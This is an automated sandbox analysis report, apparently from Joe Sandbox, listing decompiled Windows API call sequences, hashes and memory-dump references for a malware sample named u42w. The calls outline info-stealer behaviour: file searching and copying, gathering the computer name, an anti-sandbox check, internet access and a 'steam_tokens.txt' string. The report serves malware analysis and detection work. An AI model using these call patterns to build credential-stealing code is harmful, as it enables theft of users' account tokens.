                                                                                                                                                                                                                              • API String ID: 3722407311-0
                                                                                                                                                                                                                              • Opcode ID: 0d0c0eac2fe3718911e5f0e7565b39900880d399f84bae414dc93f0ff5e2b373
                                                                                                                                                                                                                              • Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d0c0eac2fe3718911e5f0e7565b39900880d399f84bae414dc93f0ff5e2b373
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041281A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F65BF0), ref: 00412838
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
                                                                                                                                                                                                                                • Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,02F61C20), ref: 0041269B
                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
                                                                                                                                                                                                                                • Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
                                                                                                                                                                                                                                • Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                              • String ID: 00A
                                                                                                                                                                                                                              • API String ID: 2104210347-95910775
                                                                                                                                                                                                                              • Opcode ID: 9c7f13206ddda485729eac7f28efb50ea8b0b3f2be96dd1d0bc30849c0ab3237
                                                                                                                                                                                                                              • Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c7f13206ddda485729eac7f28efb50ea8b0b3f2be96dd1d0bc30849c0ab3237
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C003095
                                                                                                                                                                                                                                • Part of subcall function 6C0035A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C08F688,00001000), ref: 6C0035D5
                                                                                                                                                                                                                                • Part of subcall function 6C0035A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0035E0
                                                                                                                                                                                                                                • Part of subcall function 6C0035A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0035FD
                                                                                                                                                                                                                                • Part of subcall function 6C0035A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C00363F
                                                                                                                                                                                                                                • Part of subcall function 6C0035A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C00369F
                                                                                                                                                                                                                                • Part of subcall function 6C0035A0: __aulldiv.LIBCMT ref: 6C0036E4
                                                                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C00309F
                                                                                                                                                                                                                                • Part of subcall function 6C025B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0256EE,?,00000001), ref: 6C025B85
                                                                                                                                                                                                                                • Part of subcall function 6C025B50: EnterCriticalSection.KERNEL32(6C08F688,?,?,?,6C0256EE,?,00000001), ref: 6C025B90
                                                                                                                                                                                                                                • Part of subcall function 6C025B50: LeaveCriticalSection.KERNEL32(6C08F688,?,?,?,6C0256EE,?,00000001), ref: 6C025BD8
                                                                                                                                                                                                                                • Part of subcall function 6C025B50: GetTickCount64.KERNEL32 ref: 6C025BE4
                                                                                                                                                                                                                              • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0030BE
                                                                                                                                                                                                                                • Part of subcall function 6C0030F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C003127
                                                                                                                                                                                                                                • Part of subcall function 6C0030F0: __aulldiv.LIBCMT ref: 6C003140
                                                                                                                                                                                                                                • Part of subcall function 6C03AB2A: __onexit.LIBCMT ref: 6C03AB30
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117587062.000000006C001000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117549990.000000006C000000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117761371.000000006C08E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117799562.000000006C092000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c000000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4291168024-0
                                                                                                                                                                                                                              • Opcode ID: b2d24d5d1c5d6a8cdf31aa4b89cfdd125829c749aa3d9db5aaf09d7a71364d7c
                                                                                                                                                                                                                              • Instruction ID: 171eeda8ed4c0abd827f77dae4d62d3ae4eb7f03700e4a6a38ec350be63d1d3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2d24d5d1c5d6a8cdf31aa4b89cfdd125829c749aa3d9db5aaf09d7a71364d7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CF0F922E21B4496DF10DF7488417E673BCAF6F214F619719E84857661FF2071E88386
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                                                                                                              • Opcode ID: 56d175405612ec99222efaf63e762c64211d34bef79246e5213ab755cd92519f
                                                                                                                                                                                                                              • Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56d175405612ec99222efaf63e762c64211d34bef79246e5213ab755cd92519f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4203777966-0
                                                                                                                                                                                                                              • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                              • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                              • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1103761159-0
                                                                                                                                                                                                                              • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                              • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 004119C8
                                                                                                                                                                                                                                • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00411A4D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strtok_s$FileFindFirstwsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3409980764-0
                                                                                                                                                                                                                              • Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                              • Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$lstrcpy$InternetOpen
                                                                                                                                                                                                                              • String ID: steam_tokens.txt
                                                                                                                                                                                                                              • API String ID: 2934705399-401951677
                                                                                                                                                                                                                              • Opcode ID: f13294520ed57f92bb5a91e58b27683597a8e94919879bdb8405eaded5635e50
                                                                                                                                                                                                                              • Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f13294520ed57f92bb5a91e58b27683597a8e94919879bdb8405eaded5635e50
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                                                                                                              • Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                              • Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B190
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B1A4
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 574041509-0
                                                                                                                                                                                                                              • Opcode ID: 49d430109ed41839407466bb64c8611e6235bdcf2bd12599c945c9a693aa8f51
                                                                                                                                                                                                                              • Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49d430109ed41839407466bb64c8611e6235bdcf2bd12599c945c9a693aa8f51
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040A95A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040A96E
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3635112192-0
                                                                                                                                                                                                                              • Opcode ID: 4e11729e46e31e3c97c3248b6f3b977cbce3450fd405f5926df3b654293f7180
                                                                                                                                                                                                                              • Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e11729e46e31e3c97c3248b6f3b977cbce3450fd405f5926df3b654293f7180
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
